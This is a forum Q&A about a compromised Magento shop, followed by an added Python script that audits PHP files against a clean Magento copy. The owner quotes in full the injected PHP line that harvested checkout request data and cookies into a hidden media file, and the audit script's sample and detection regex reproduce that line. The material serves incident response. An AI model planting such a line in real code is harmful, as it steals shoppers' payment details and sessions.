Since this morning I'm getting the following PHP Notice after running the Magento cronjob:
Undefined index: REQUEST_URI in /htdocs/lib/Varien/Autoload.php on line 1
I did not modify any of the Mage files. How is this possible?
EDIT: For now I've edited the Autoload.php to first check if the REQUEST_URI is set.
Original:
<?php if(preg_match("/checkout|payment/", $_SERVER["REQUEST_URI"]))
New:
<?php if(isset($_SERVER["REQUEST_URI"]) && preg_match("/checkout|payment/", $_SERVER["REQUEST_URI"]))
EDIT 30-04-2015:
After reading the comments from @volkan and @b.enoit.be, I immediately replaced the specified page with the original one from Magento, and the line was indeed not present!
The following was the malicious line present in Autoload.php
<?php if(preg_match("/checkout|payment/", $_SERVER["REQUEST_URI"])){@file_put_contents(realpath("./")."/media/catalog/product/cache_catalogs", @base64_encode(serialize($_REQUEST)."--".serialize($_COOKIE)). ":", FILE_APPEND); }?>
I've also checked:
However, there were two new admin-users which had obscure names:
Both users have been deleted. The website was also vulnerable to the Shoplift exploit (which is addressed in the latest security patch).
We're currently busy installing the latest security patches.
It seems that this has been a recent problem:
100,000 web shops open to compromise as attackers exploit Magento bug
Magento Shoplift Bug Tester v1.0
Thanks to all users for their help.
It looks like your page has been compromised. Replace the file with the original one, and install the security patches for Magento. Check whether there are any new admin users in the backend, and check for the module Magpleasure_Filesystem.
Also check /js/index.php and /index.php.
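
The advice above to compare files with the originals can be automated. The following is an added example, not code from the posts or from Magento: a Python script that compares every PHP file of an installation against a pristine copy of the same Magento version and also flags code that serializes request data, as the injected line in the question does. The `audit` and `demo` names, the directory layout and the sample files are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Heuristic: request superglobals serialized or written to disk by PHP code.
CAPTURE = re.compile(
    r"serialize\s*\(\s*\$_(REQUEST|POST|COOKIE)|"
    r"file_put_contents\s*\([^;]*\$_(REQUEST|POST|COOKIE)", re.I)

def audit(installed, pristine):
    """Return {relative path: [findings]} for PHP files under `installed`."""
    installed, pristine = Path(installed), Path(pristine)
    report = {}
    for f in sorted(installed.rglob("*.php")):
        rel = f.relative_to(installed)
        ref = pristine / rel
        findings = []
        if not ref.is_file():
            findings.append("not in pristine tree")
        elif ref.read_bytes() != f.read_bytes():
            findings.append("differs from pristine copy")
        if CAPTURE.search(f.read_text(errors="replace")):
            findings.append("captures request data")
        if findings:
            report[rel.as_posix()] = findings
    return report

def demo():
    """Audit two constructed trees: a clean reference and a tampered install."""
    clean = "<?php\nclass Varien_Autoload {}\n"
    # Constructed sample modelled on the injected line quoted in the question.
    injected = ('<?php if(preg_match("/checkout|payment/", $_SERVER["REQUEST_URI"]))'
                '{@file_put_contents("cache_catalogs", '
                '@base64_encode(serialize($_REQUEST)), FILE_APPEND); }?>\n')
    with tempfile.TemporaryDirectory() as tmp:
        for tree, body in (("pristine", clean), ("installed", injected + clean)):
            p = Path(tmp, tree, "lib/Varien/Autoload.php")
            p.parent.mkdir(parents=True)
            p.write_text(body)
        # Constructed: a PHP file with no counterpart in the reference tree.
        extra = Path(tmp, "installed/media/dropped.php")
        extra.parent.mkdir(parents=True)
        extra.write_text("<?php echo 1;\n")
        return audit(Path(tmp, "installed"), Path(tmp, "pristine"))

if __name__ == "__main__":
    for path, findings in demo().items():
        print(path, "->", ", ".join(findings))
```

Against a real shop, call `audit()` with the document root and an unpacked download of the exact Magento version in use; files from installed extensions will be reported as not in the pristine tree and need manual review.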